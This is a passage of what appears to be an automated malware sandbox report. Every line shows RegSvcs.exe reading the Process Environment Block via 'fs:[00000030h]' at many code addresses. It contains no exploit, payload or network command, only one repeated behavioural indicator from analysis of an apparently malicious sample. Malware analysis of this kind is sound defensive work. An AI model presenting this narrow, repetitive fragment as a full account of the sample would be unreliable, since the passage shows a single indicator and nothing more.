                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF03E9 mov eax, dword ptr fs:[00000030h]3_2_00FF03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE83C0 mov eax, dword ptr fs:[00000030h]3_2_00FE83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA3C0 mov eax, dword ptr fs:[00000030h]3_2_00FEA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01068243 mov eax, dword ptr fs:[00000030h]3_2_01068243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01068243 mov ecx, dword ptr fs:[00000030h]3_2_01068243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109A250 mov eax, dword ptr fs:[00000030h]3_2_0109A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109A250 mov eax, dword ptr fs:[00000030h]3_2_0109A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8397 mov eax, dword ptr fs:[00000030h]3_2_00FD8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8397 mov eax, dword ptr fs:[00000030h]3_2_00FD8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8397 mov eax, dword ptr fs:[00000030h]3_2_00FD8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE388 mov eax, dword ptr fs:[00000030h]3_2_00FDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE388 mov eax, dword ptr fs:[00000030h]3_2_00FDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE388 mov eax, dword ptr fs:[00000030h]3_2_00FDE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090274 mov eax, dword ptr fs:[00000030h]3_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060283 mov eax, dword ptr fs:[00000030h]3_2_01060283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060283 mov eax, dword ptr fs:[00000030h]3_2_01060283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060283 mov eax, dword ptr fs:[00000030h]3_2_01060283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E284 mov eax, dword ptr fs:[00000030h]3_2_0101E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E284 mov eax, dword ptr fs:[00000030h]3_2_0101E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov ecx, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010762A0 mov eax, dword ptr fs:[00000030h]3_2_010762A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC310 mov ecx, dword ptr fs:[00000030h]3_2_00FDC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076500 mov eax, dword ptr fs:[00000030h]3_2_01076500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4500 mov eax, dword ptr fs:[00000030h]3_2_010B4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE04E5 mov ecx, dword ptr fs:[00000030h]3_2_00FE04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E53E mov eax, dword ptr fs:[00000030h]3_2_0100E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE64AB mov eax, dword ptr fs:[00000030h]3_2_00FE64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101656A mov eax, dword ptr fs:[00000030h]3_2_0101656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101656A mov eax, dword ptr fs:[00000030h]3_2_0101656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101656A mov eax, dword ptr fs:[00000030h]3_2_0101656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014588 mov eax, dword ptr fs:[00000030h]3_2_01014588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E59C mov eax, dword ptr fs:[00000030h]3_2_0101E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD645D mov eax, dword ptr fs:[00000030h]3_2_00FD645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010605A7 mov eax, dword ptr fs:[00000030h]3_2_010605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010605A7 mov eax, dword ptr fs:[00000030h]3_2_010605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010605A7 mov eax, dword ptr fs:[00000030h]3_2_010605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010045B1 mov eax, dword ptr fs:[00000030h]3_2_010045B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010045B1 mov eax, dword ptr fs:[00000030h]3_2_010045B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E5CF mov eax, dword ptr fs:[00000030h]3_2_0101E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E5CF mov eax, dword ptr fs:[00000030h]3_2_0101E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A5D0 mov eax, dword ptr fs:[00000030h]3_2_0101A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A5D0 mov eax, dword ptr fs:[00000030h]3_2_0101A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDC427 mov eax, dword ptr fs:[00000030h]3_2_00FDC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE420 mov eax, dword ptr fs:[00000030h]3_2_00FDE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE420 mov eax, dword ptr fs:[00000030h]3_2_00FDE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE420 mov eax, dword ptr fs:[00000030h]3_2_00FDE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E5E7 mov eax, dword ptr fs:[00000030h]3_2_0100E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C5ED mov eax, dword ptr fs:[00000030h]3_2_0101C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C5ED mov eax, dword ptr fs:[00000030h]3_2_0101C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01018402 mov eax, dword ptr fs:[00000030h]3_2_01018402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01018402 mov eax, dword ptr fs:[00000030h]3_2_01018402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01018402 mov eax, dword ptr fs:[00000030h]3_2_01018402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE25E0 mov eax, dword ptr fs:[00000030h]3_2_00FE25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01066420 mov eax, dword ptr fs:[00000030h]3_2_01066420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE65D0 mov eax, dword ptr fs:[00000030h]3_2_00FE65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A430 mov eax, dword ptr fs:[00000030h]3_2_0101A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E443 mov eax, dword ptr fs:[00000030h]3_2_0101E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100245A mov eax, dword ptr fs:[00000030h]3_2_0100245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109A456 mov eax, dword ptr fs:[00000030h]3_2_0109A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106C460 mov ecx, dword ptr fs:[00000030h]3_2_0106C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100A470 mov eax, dword ptr fs:[00000030h]3_2_0100A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100A470 mov eax, dword ptr fs:[00000030h]3_2_0100A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100A470 mov eax, dword ptr fs:[00000030h]3_2_0100A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE2582 mov eax, dword ptr fs:[00000030h]3_2_00FE2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE2582 mov ecx, dword ptr fs:[00000030h]3_2_00FE2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109A49A mov eax, dword ptr fs:[00000030h]3_2_0109A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8550 mov eax, dword ptr fs:[00000030h]3_2_00FE8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8550 mov eax, dword ptr fs:[00000030h]3_2_00FE8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010144B0 mov ecx, dword ptr fs:[00000030h]3_2_010144B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106A4B0 mov eax, dword ptr fs:[00000030h]3_2_0106A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0535 mov eax, dword ptr fs:[00000030h]3_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0535 mov eax, dword ptr fs:[00000030h]3_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0535 mov eax, dword ptr fs:[00000030h]3_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0535 mov eax, dword ptr fs:[00000030h]3_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0535 mov eax, dword ptr fs:[00000030h]3_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0535 mov eax, dword ptr fs:[00000030h]3_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C700 mov eax, dword ptr fs:[00000030h]3_2_0101C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01010710 mov eax, dword ptr fs:[00000030h]3_2_01010710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C720 mov eax, dword ptr fs:[00000030h]3_2_0101C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C720 mov eax, dword ptr fs:[00000030h]3_2_0101C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105C730 mov eax, dword ptr fs:[00000030h]3_2_0105C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101273C mov eax, dword ptr fs:[00000030h]3_2_0101273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101273C mov ecx, dword ptr fs:[00000030h]3_2_0101273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101273C mov eax, dword ptr fs:[00000030h]3_2_0101273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101674D mov esi, dword ptr fs:[00000030h]3_2_0101674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101674D mov eax, dword ptr fs:[00000030h]3_2_0101674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101674D mov eax, dword ptr fs:[00000030h]3_2_0101674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022750 mov eax, dword ptr fs:[00000030h]3_2_01022750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022750 mov eax, dword ptr fs:[00000030h]3_2_01022750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01064755 mov eax, dword ptr fs:[00000030h]3_2_01064755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E75D mov eax, dword ptr fs:[00000030h]3_2_0106E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4690 mov eax, dword ptr fs:[00000030h]3_2_00FE4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4690 mov eax, dword ptr fs:[00000030h]3_2_00FE4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108678E mov eax, dword ptr fs:[00000030h]3_2_0108678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010947A0 mov eax, dword ptr fs:[00000030h]3_2_010947A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFC640 mov eax, dword ptr fs:[00000030h]3_2_00FFC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010607C3 mov eax, dword ptr fs:[00000030h]3_2_010607C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE262C mov eax, dword ptr fs:[00000030h]3_2_00FE262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE627 mov eax, dword ptr fs:[00000030h]3_2_00FFE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E7E1 mov eax, dword ptr fs:[00000030h]3_2_0106E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010027ED mov eax, dword ptr fs:[00000030h]3_2_010027ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010027ED mov eax, dword ptr fs:[00000030h]3_2_010027ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010027ED mov eax, dword ptr fs:[00000030h]3_2_010027ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF260B mov eax, dword ptr fs:[00000030h]3_2_00FF260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE47FB mov eax, dword ptr fs:[00000030h]3_2_00FE47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE47FB mov eax, dword ptr fs:[00000030h]3_2_00FE47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E609 mov eax, dword ptr fs:[00000030h]3_2_0105E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022619 mov eax, dword ptr fs:[00000030h]3_2_01022619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01016620 mov eax, dword ptr fs:[00000030h]3_2_01016620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01018620 mov eax, dword ptr fs:[00000030h]3_2_01018620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEC7C0 mov eax, dword ptr fs:[00000030h]3_2_00FEC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE07AF mov eax, dword ptr fs:[00000030h]3_2_00FE07AF
